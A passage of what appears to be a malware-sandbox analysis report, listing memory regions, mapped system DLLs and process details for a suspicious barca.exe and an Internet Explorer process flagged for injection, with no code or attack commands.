region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4431 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4432 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 4433 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 4434 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 4435 start_va = 0x110000 end_va = 0x126fff monitored = 0 entry_point = 0x1114a1 region_type = mapped_file name = "barca.exe" filename = "\\Program Files\\MSBuild\\barca.exe" (normalized: "c:\\program files\\msbuild\\barca.exe") Region: id = 4436 start_va = 0x130000 end_va = 0x1edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4437 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4438 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4439 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4440 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 4441 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 4442 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4443 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4444 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 4445 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 4446 start_va = 0xa90000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 4447 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 4448 start_va = 0x1f20000 end_va = 0x1fdbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 4449 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4450 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4451 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4452 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4453 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4454 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4455 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4456 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4457 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4458 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4459 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4460 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4461 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4462 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4463 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4464 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4465 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4466 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4467 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4468 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4469 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4470 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4471 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4472 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4473 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4474 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 265 os_tid = 0x1280 Thread: id = 266 os_tid = 0x1128 Process: id = "72" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0xb243000" os_pid = "0xc90" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x23c" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:572 CREDAT:82945 /prefetch:2" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1921 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1922 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1923 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1924 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1925 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1926 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1927 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1928 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1929 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1930 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1931 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1932 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 1933 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1934 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1935 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1936 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1937 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1938 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1939 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1940 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1941 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1942 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 1943 start_va = 0x8f0000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 1944 start_va = 0x900000 end_va = 0x903fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 1945 start_va = 0x910000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 1946 start_va = 0x930000 end_va = 0x930fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 1947 start_va = 0x940000 end_va = 0x940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1948 start_va = 0x950000 end_va = 0x950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 1949 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1950 start_va = 0x970000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 1951 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 1952 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 1953 start_va = 0x9d0000 end_va = 0xa99fff monitored = 0 entry_point = 0x9d3a40 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 1954 start_va = 0xaa0000 end_va = 0x4a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 1955 start_va = 0x4aa0000 end_va = 0x4c20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004aa0000" filename = "" Region: id = 1956 start_va = 0x4c30000 end_va = 0x602ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c30000" filename = "" Region: id = 1957 start_va = 0x6030000 end_va = 0x6366fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1958 start_va = 0x6370000 end_va = 0x646ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006370000" filename = "" Region: id = 1959 start_va = 0x6470000 end_va = 0x647ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006470000" filename = "" Region: id = 1960 start_va = 0x6480000 end_va = 0x64bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006480000" filename = "" Region: id = 1961 start_va = 0x64c0000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 1962 start_va = 0x6500000 end_va = 0x650ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1963 start_va = 0x6510000 end_va = 0x654ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006510000" filename = "" Region: id = 1964 start_va = 0x6550000 end_va = 0x6550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006550000" filename = "" Region: id = 1965 start_va = 0x6560000 end_va = 0x659ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006560000" filename = "" Region: id = 1966 start_va = 0x65a0000 end_va = 0x65a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000065a0000" filename = "" Region: id = 1967 start_va = 0x65b0000 end_va = 0x65b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000065b0000" filename = "" Region: id = 1968 start_va = 0x65c0000 end_va = 0x65c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000065c0000" filename = "" Region: id = 1969 start_va = 0x65d0000 end_va = 0x65d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000065d0000" filename = "" Region: id = 1970 start_va = 0x65e0000 end_va = 0x65e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000065e0000" filename = "" Region: id = 1971 start_va = 0x65f0000 end_va = 0x65f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000065f0000" filename = "" Region: id = 1972 start_va = 0x6600000 end_va = 0x660ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 1973 start_va = 0x6610000 end_va = 0x670ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006610000" filename = "" Region: id = 1974 start_va = 0x6710000 end_va = 0x680ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006710000" filename = "" Region: id = 1975 start_va = 0x6810000 end_va = 0x690ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006810000" filename = "" Region: id = 1976 start_va = 0x6910000 end_va = 0x6a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006910000" filename = "" Region: id = 1977 start_va = 0x6a10000 end_va = 0x6b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a10000" filename = "" Region: id = 1978 start_va = 0x6b10000 end_va = 0x6d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b10000" filename = "" Region: id = 1979 start_va = 0x6d10000 end_va = 0x6dcbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006d10000" filename = "" Region: id = 1980 start_va = 0x6dd0000 end_va = 0x6e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006dd0000" filename = "" Region: id = 1981 start_va = 0x6e10000 end_va = 0x6f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e10000" filename = "" Region: id = 1982 start_va = 0x6f10000 end_va = 0x6f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f10000" filename = "" Region: id = 1983 start_va = 0x6f50000 end_va = 0x704ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f50000" filename = "" Region: id = 1984 start_va = 0x7050000 end_va = 0x71d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ieframe.dll.mui") Region: id = 1985 start_va = 0x71e0000 end_va = 0x725ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071e0000" filename = "" Region: id = 1986 start_va = 0x7260000 end_va = 0x7260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007260000" filename = "" Region: id = 1987 start_va = 0x7270000 end_va = 0x7270fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007270000" filename = "" Region: id = 1988 start_va = 0x7280000 end_va = 0x7280fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007280000" filename = "" Region: id = 1989 start_va = 0x7290000 end_va = 0x7290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007290000" filename = "" Region: id = 1990 start_va = 0x72a0000 end_va = 0x72a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 1991 start_va = 0x72b0000 end_va = 0x72b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072b0000" filename = "" Region: id = 1992 start_va = 0x72c0000 end_va = 0x72c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072c0000" filename = "" Region: id = 1993 start_va = 0x72d0000 end_va = 0x730ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072d0000" filename = "" Region: id = 1994 start_va = 0x7310000 end_va = 0x735ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 1995 start_va = 0x7360000 end_va = 0x739ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007360000" filename = "" Region: id = 1996 start_va = 0x73a0000 end_va = 0x749ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000073a0000" filename = "" Region: id = 1997 start_va = 0x74a0000 end_va = 0x74bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000074a0000" filename = "" Region: id = 1998 start_va = 0x74c0000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000074c0000" filename = "" Region: id = 1999 start_va = 0x7500000 end_va = 0x754ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 2000 start_va = 0x7550000 end_va = 0x756ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007550000" filename = "" Region: id = 2001 start_va = 0x7570000 end_va = 0x75affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007570000" filename = "" Region: id = 2002 start_va = 0x75b0000 end_va = 0x76affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075b0000" filename = "" Region: id = 2003 start_va = 0x76b0000 end_va = 0x76cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076b0000" filename = "" Region: id = 2004 start_va = 0x76d0000 end_va = 0x76effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076d0000" filename = "" Region: id = 2005 start_va = 0x76f0000 end_va = 0x770ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000076f0000" filename = "" Region: id = 2006 start_va = 0x7710000 end_va = 0x7712fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007710000" filename = "" Region: id = 2007 start_va = 0x7720000 end_va = 0x7b1afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007720000" filename = "" Region: id = 2008 start_va = 0x7b20000 end_va = 0x7b22fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007b20000" filename = "" Region: id = 2009 start_va = 0x7b30000 end_va = 0x7b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b30000" filename = "" Region: id = 2010 start_va = 0x7b70000 end_va = 0x7c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b70000" filename = "" Region: id = 2011 start_va = 0x7c70000 end_va = 0x7c70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c70000" filename = "" Region: id = 2012 start_va = 0x7c80000 end_va = 0x7c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c80000" filename = "" Region: id = 2013 start_va = 0x7c90000 end_va = 0x7c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c90000" filename = "" Region: id = 2014 start_va = 0x7ca0000 end_va = 0x7cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ca0000" filename = "" Region: id = 2015 start_va = 0x7ce0000 end_va = 0x7ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ce0000" filename = "" Region: id = 2016 start_va = 0x7de0000 end_va = 0x7e0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007de0000" filename = "" Region: id = 2017 start_va = 0x7e10000 end_va = 0x7e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e10000" filename = "" Region: id = 2018 start_va = 0x7e20000 end_va = 0x7e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e20000" filename = "" Region: id = 2019 start_va = 0x7e60000 end_va = 0x7f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e60000" filename = "" Region: id = 2020 start_va = 0x7f60000 end_va = 0x7f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f60000" filename = "" Region: id = 2021 start_va = 0x7fa0000 end_va = 0x809ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fa0000" filename = "" Region: id = 2022 start_va = 0x80a0000 end_va = 0x80a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080a0000" filename = "" Region: id = 2023 start_va = 0x80b0000 end_va = 0x80effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080b0000" filename = "" Region: id = 2024 start_va = 0x80f0000 end_va = 0x81effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080f0000" filename = "" Region: id = 2025 start_va = 0x81f0000 end_va = 0x81f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000081f0000" filename = "" Region: id = 2026 start_va = 0x8210000 end_va = 0x821ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008210000" filename = "" Region: id = 2027 start_va = 0x8220000 end_va = 0x825ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008220000" filename = "" Region: id = 2028 start_va = 0x8260000 end_va = 0x845ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008260000" filename = "" Region: id = 2029 start_va = 0x8460000 end_va = 0x8461fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008460000" filename = "" Region: id = 2030 start_va = 0x8480000 end_va = 0x857ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008480000" filename = "" Region: id = 2031 start_va = 0x8580000 end_va = 0x8580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008580000" filename = "" Region: id = 2032 start_va = 0x8590000 end_va = 0x8592fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008590000" filename = "" Region: id = 2033 start_va = 0x8680000 end_va = 0x86bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008680000" filename = "" Region: id = 2034 start_va = 0x86c0000 end_va = 0x87bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086c0000" filename = "" Region: id = 2035 start_va = 0x87c0000 end_va = 0x87c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087c0000" filename = "" Region: id = 2036 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2037 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2038 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2039 start_va = 0x6ba90000 end_va = 0x6bac2fff monitored = 0 entry_point = 0x6baa0e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 2040 start_va = 0x6bad0000 end_va = 0x6bb09fff monitored = 0 entry_point = 0x6bae9be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: 